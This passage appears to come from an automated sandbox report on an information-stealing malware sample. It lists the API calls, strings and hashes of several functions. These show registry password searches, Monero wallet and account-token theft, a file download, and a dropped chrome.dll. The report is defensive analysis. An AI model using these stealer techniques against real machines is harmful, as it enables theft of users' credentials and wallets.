                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID: :
                                        • API String ID: 2677904052-3653984579
                                        • Opcode ID: b431c9a4fcdb27a0ef6cfaca895fbb4ce75a4ae75689dce41d2ba2d46764ae06
                                        • Instruction ID: 6b4fb87e21f58d21f36b628bd30aad6ffd9ef4c930b68fed177bef9b2e573af7
                                        • Opcode Fuzzy Hash: b431c9a4fcdb27a0ef6cfaca895fbb4ce75a4ae75689dce41d2ba2d46764ae06
                                        • Instruction Fuzzy Hash: 2C3152B1904208EBDB08EBE4DDA9EFF777DEB44301B604118F112672A1EE38E946DB51
                                        Function 007C8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0165E850,00000000,?,007D0E14,00000000,?,00000000), ref: 007C82C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C82C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007C82E8
                                        • __aulldiv.LIBCMT ref: 007C8302
                                        • __aulldiv.LIBCMT ref: 007C8310
                                        • wsprintfA.USER32 ref: 007C833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 6db439d093cab192ee7003e96f41e4887b6df93ed5726426990412d155ea9500
                                        • Instruction ID: 8eee4ba22bbf9156e6e8efef686ff3c9bfc70e974deae25f6e737a8b3573726a
                                        • Opcode Fuzzy Hash: 6db439d093cab192ee7003e96f41e4887b6df93ed5726426990412d155ea9500
                                        • Instruction Fuzzy Hash: 3C212CB1E44209ABDB10DFD4CC49FAEB7B8FB44B10F20451DF615BB280D77899018BA5
                                        Function 007B60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007B4889
                                          • Part of subcall function 007B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007B4899
                                        • InternetOpenA.WININET(007D0DFB,00000001,00000000,00000000,00000000), ref: 007B615F
                                        • StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007B61DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007B6203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 007B622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007B625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 007B6299
                                        • InternetCloseHandle.WININET(?), ref: 007B62A3
                                        • InternetCloseHandle.WININET(00000000), ref: 007B62B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 889a9f8ae6da65355fed2aac4e16db35b21e0af4fff352166b543e8e70b77c1e
                                        • Instruction ID: 3d8edcf042204a4703e6fe18cd7504b657f62e2188476b24670c4580552000d5
                                        • Opcode Fuzzy Hash: 889a9f8ae6da65355fed2aac4e16db35b21e0af4fff352166b543e8e70b77c1e
                                        • Instruction Fuzzy Hash: 61512CB1A00218ABEF20DF90DC49FEE7779BB44705F108198E705A7191DB78AA89CF95
                                        Function 0083012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 0083024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 0083035B
                                        • CatchIt.LIBVCRUNTIME ref: 008303AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 008304C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 09a76703d19c6450a7ee11d7e1fd57485bb25445c33241167a31bea69c25f20a
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 97B16731801219EFCF15DFA8D8A19AEBBB5FF84314F10816AE911AB212D770DA51CFD6
                                        Function 007B7330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007B7411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007B746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007B74B2
                                        • HeapFree.KERNEL32(00000000), ref: 007B74B9
                                        • task.LIBCPMTD ref: 007B75B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuetask
                                        • String ID: Password
                                        • API String ID: 775622407-3434357891
                                        • Opcode ID: 237a9ddcde40478f44dc94651e903f88315ee9bd6155a528fa03d256b1e00125
                                        • Instruction ID: 2163b3246f23237e4f57d270fd2e87f4241e6990d25db304d4b094b2c27d89d3
                                        • Opcode Fuzzy Hash: 237a9ddcde40478f44dc94651e903f88315ee9bd6155a528fa03d256b1e00125
                                        • Instruction Fuzzy Hash: 7061E9B5D0416CDBDB24DB50CC55BDAB7B8BF48300F0081E9E649A6145EB74ABC9CFA1
                                        Function 007BBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • lstrlen.KERNEL32(00000000), ref: 007BBC6F
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 007BBC9D
                                        • lstrlen.KERNEL32(00000000), ref: 007BBD75
                                        • lstrlen.KERNEL32(00000000), ref: 007BBD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 05bb3ea84f2b4098a1fd549832268036b67c5af1be9d18c7ef85ec7a8d3356c0
                                        • Instruction ID: 1f23743252f38823dfb0c5d25a25d8f3793a01cb5a87dec894698bdcdbf24038
                                        • Opcode Fuzzy Hash: 05bb3ea84f2b4098a1fd549832268036b67c5af1be9d18c7ef85ec7a8d3356c0
                                        • Instruction Fuzzy Hash: 74B11FB191010CEBCB14EBA0DDAAFEE7339AF54309F50455DF50662191EF786E48CB62
                                        Function 007C6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: ba2bc93435f575592b839c8a7eafb8f1ff9c4e53d12093fbf52eaa60d33604e4
                                        • Instruction ID: ed27f83fbf4a1f0e3f0eba9a7266be4d5678985f4b4119747ea83bdc0c941bc6
                                        • Opcode Fuzzy Hash: ba2bc93435f575592b839c8a7eafb8f1ff9c4e53d12093fbf52eaa60d33604e4
                                        • Instruction Fuzzy Hash: 1DF08C3090C209EFD344EFE0EC8DF9CBB30EB04707F218299F609965A0DA748A81DB61
                                        Function 007C08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007C08DC,C:\ProgramData\chrome.dll), ref: 007C9871
                                          • Part of subcall function 007BA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007BA098
                                        • StrCmpCA.SHLWAPI(00000000,01658A28), ref: 007C0922
                                        • StrCmpCA.SHLWAPI(00000000,01658978), ref: 007C0B79
                                        • StrCmpCA.SHLWAPI(00000000,016589B8), ref: 007C0A0C
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007C0C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 007C08CD
                                        • C:\ProgramData\chrome.dll, xrefs: 007C0C30
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: cf4d2eba8fd130e9aec2298282c4a34f6efe1f17fedbf59718e85323b5b58d57
                                        • Instruction ID: 6ab25159ef968cb8ff814551e924bb6a7f29092b92564a572fac3788fb107c9e
                                        • Opcode Fuzzy Hash: cf4d2eba8fd130e9aec2298282c4a34f6efe1f17fedbf59718e85323b5b58d57
                                        • Instruction Fuzzy Hash: 85A12371700208EFCB28EF64DA96FED7776AF94304F50816DE80A9F251DA34DA05CB96
                                        Function 007B9E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                        • wsprintfA.USER32 ref: 007B9E7F
                                        • lstrcat.KERNEL32(00000000,?), ref: 007B9F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 007B9F17
                                        • lstrcat.KERNEL32(00000000,007D12D8), ref: 007B9F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 007B9F7C
                                        • Sleep.KERNEL32(00001388), ref: 007BA013
                                          • Part of subcall function 007C99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C99C5
                                          • Part of subcall function 007C99A0: Process32First.KERNEL32(007BA056,00000128), ref: 007C99D9
                                          • Part of subcall function 007C99A0: Process32Next.KERNEL32(007BA056,00000128), ref: 007C99F2
                                          • Part of subcall function 007C99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C9A4E
                                          • Part of subcall function 007C99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007C9A6C
                                          • Part of subcall function 007C99A0: CloseHandle.KERNEL32(00000000), ref: 007C9A79
                                          • Part of subcall function 007C99A0: CloseHandle.KERNEL32(007BA056), ref: 007C9A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 531068710-2746444292
                                        • Opcode ID: 139f328d2157da79605ea8a9e44b872ca40324db633154c0baf398586234ec9a
                                        • Instruction ID: aa20a7cd89466831e36db2309c37c8acca357a50c04e661a3df333867b3574b7
                                        • Opcode Fuzzy Hash: 139f328d2157da79605ea8a9e44b872ca40324db633154c0baf398586234ec9a
                                        • Instruction Fuzzy Hash: 535165B1944318EBEB24DB60DC8EFDA7778AF44700F14459CB60DAB281EA75AB84CF51
                                        Function 0082F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
